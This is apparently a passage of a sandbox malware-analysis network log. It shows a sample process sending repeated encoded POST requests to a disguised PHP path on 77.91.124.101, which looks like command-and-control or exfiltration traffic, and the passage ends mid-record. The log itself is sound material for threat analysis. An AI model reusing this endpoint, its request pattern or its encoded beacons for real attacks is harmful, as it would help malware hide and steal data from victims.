                                                            Nov 21, 2023 04:47:36.113682032 CET | 201 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:36.311444998 CET | 201 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:36.311707973 CET | 204 | OUT | Data Raw: 57 50 5d 59 5b 5b 5a 5f 5d 57 55 57 55 5c 57 52 50 53 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[[Z_]WUWU\WRPSXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+5<:)8/B6]#!Y< "R&.:Q'29+9?X/&G''^)/
                                                            Nov 21, 2023 04:47:36.515629053 CET | 204 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            16 | 192.168.2.5 | 49728 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:36.833880901 CET | 205 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.031764984 CET | 205 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.032001972 CET | 208 | OUT | Data Raw: 57 59 5d 5e 5e 58 5a 59 5d 57 55 57 55 5d 57 55 50 53 58 48 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^^XZY]WUWU]WUPSXHV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(Z(;=+_/76_#!^+>R$.>R002-8*\</.&G''^)+
                                                            Nov 21, 2023 04:47:37.236182928 CET208INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            17 | 77.91.124.101 | 80 | 192.168.2.5 | 49729 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:37.555521011 CET209OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.755810976 CET209INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.756151915 CET212OUTData Raw: 52 5d 5d 5d 5b 59 5f 5b 5d 57 55 57 55 56 57 51 50 59 58 42 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][Y_[]WUWUVWQPYXBV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*5Z?))7;44=(*P'>.W$!,(9+,/.&G''^)
                                                            Nov 21, 2023 04:47:37.961127996 CET212INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:37 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            18 | 192.168.2.5 | 49730 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:38.006661892 CET213OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.204606056 CET214INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.204896927 CET215OUTData Raw: 52 58 58 50 5e 5e 5a 5d 5d 57 55 57 55 5d 57 5a 50 5e 58 41 56 54 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXP^^Z]]WUWU]WZP^XAVTW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(.+&U)'[.$6#*5+3.S$>&3.R..?+]/&G''^)+
                                                            Nov 21, 2023 04:47:38.409367085 CET218INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5b 32 2c 3f 03 37 55 3f 53 3c 2a 25 52 2d 07 3e 41 3f 33 22 07 25 2d 16 5f 27 39 3e 0b 3f 11 01 03 27 17 23 0e 23 50 23 05 2a 1a 21 5a 0c 1d 26 5b 21 5e 3f 1e 3f 3d 24 13 28 13 2c 5c 25 1f 27 17 3c 00 27 53 21 30 23 10 25 33 37 08 2c 01 25 5f 2d 01 31 1b 26 5a 21 01 37 07 23 5f 0c 14 27 19 22 31 0d 5b 23 30 22 56 23 37 33 01 37 27 33 53 24 2d 0e 1e 26 16 2d 1a 2b 16 2b 0d 32 0e 24 50 26 3a 01 1d 25 07 01 51 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "[2,?7U?S<*%R->A?3"%-_'9>?'##P#*!Z&[!^??=$(,\%'<'S!0#%37,%_-1&Z!7#_'"1[#0"V#737'3S$-&-++2$P&:%Q<*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            19 | 77.91.124.101 | 80 | 192.168.2.5 | 49731 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:38.151434898 CET214OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:38.349040985 CET215INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:38.349267006 CET218OUTData Raw: 52 5a 58 59 5b 5c 5a 58 5d 57 55 57 55 5a 57 56 50 5d 58 45 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZXY[\ZX]WUWUZWVP]XEV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')5<)?;57=X(0=32R$3..]&?,#/&G''^)7
                                                            Nov 21, 2023 04:47:38.555543900 CET219INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            2 | 77.91.124.101 | 80 | 192.168.2.5 | 49714 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:27.412916899 CET150OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:27.609544992 CET151INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:27.609765053 CET153OUTData Raw: 57 5e 58 5a 5b 5c 5a 51 5d 57 55 57 55 5b 57 54 50 5e 58 40 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^XZ[\ZQ]WUWU[WTP^X@VQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')=8"*3$8$&Z#^(3!3=$V98&(,,&G''^)3
                                                            Nov 21, 2023 04:47:27.814687014 CET154INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            20 | 192.168.2.5 | 49732 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:38.877762079 CET220OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:39.075643063 CET220INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.075918913 CET223OUTData Raw: 57 5a 58 5e 5b 5e 5f 5e 5d 57 55 57 55 56 57 50 50 5f 58 41 56 52 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX^[^_^]WUWUVWPP_XAVRW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X>(1X=+=<8!4\&( =3>>P$31:>?7Y;&G''^)
                                                            Nov 21, 2023 04:47:39.280512094 CET223INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:38 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            21 | 192.168.2.5 | 49733 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:39.598589897 CET | 224 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:39.795681000 CET | 224 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:39.795901060 CET | 227 | OUT | Data Raw: 57 59 58 5f 5b 59 5a 5b 5d 57 55 57 55 5d 57 54 50 5b 58 44 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX_[YZ[]WUWU]WTP[XDV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(<*U)0#\8$#%+ 93>2'T9+*\>,']/&G''^)+
                                                            Nov 21, 2023 04:47:39.999308109 CET | 227 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            22 | 77.91.124.101 | 80 | 192.168.2.5 | 49734 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:40.322233915 CET | 228 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:40.520041943 CET | 228 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:40.520492077 CET | 231 | OUT | Data Raw: 57 5e 5d 5e 5b 5b 5a 5b 5d 57 55 57 55 5b 57 5b 50 5d 58 40 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]^[[Z[]WUWU[W[P]X@VWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=Z+89>#?]/Z#=)#.3-*P$:8%<?#^8&G''^)3
                                                            Nov 21, 2023 04:47:40.724601984 CET | 231 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            23 | 77.91.124.101 | 80 | 192.168.2.5 | 49735 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:41.051342010 CET | 232 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:41.248904943 CET | 232 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:41.249264956 CET | 235 | OUT | Data Raw: 57 58 58 5e 5e 5a 5a 59 5d 57 55 57 55 5c 57 52 50 5c 58 48 56 5f 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX^^ZZY]WUWU\WRP\XHV_W[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)_=+:W=#8,Z 99Y(3&-2W00::;=? ,&G''^)/
                                                            Nov 21, 2023 04:47:41.453973055 CET | 235 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            24 | 77.91.124.101 | 80 | 192.168.2.5 | 49736 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:41.808120012 CET | 236 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:42.007024050 CET | 236 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:42.171473026 CET | 239 | OUT | Data Raw: 57 5d 58 5f 5b 5f 5f 59 5d 57 55 57 55 56 57 50 50 59 58 44 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X_[__Y]WUWUVWPPYXDVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=;)Y?;>)3.'%#:5^?5'.1$>S.+6^?//>&G''^)
                                                            Nov 21, 2023 04:47:42.377120018 CET | 239 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            25 | 77.91.124.101 | 80 | 192.168.2.5 | 49738 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:44.099560022 CET | 241 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:44.297482967 CET | 241 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:44.297697067 CET | 243 | OUT | Data Raw: 57 59 58 5e 5b 59 5f 5e 5d 57 55 57 55 5e 57 53 50 58 58 41 56 51 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[Y_^]WUWU^WSPXXAVQW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_=2((.=#7Z8\"*%X?U>3-2'--?<4,&G''^)/
                                                            Nov 21, 2023 04:47:44.501955986 CET | 244 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            26 | 192.168.2.5 | 49739 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:44.819467068 CET | 244 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:45.015990973 CET | 245 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.016554117 CET | 247 | OUT | Data Raw: 57 5b 58 5d 5b 5a 5a 58 5d 57 55 57 55 57 57 56 50 5a 58 41 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
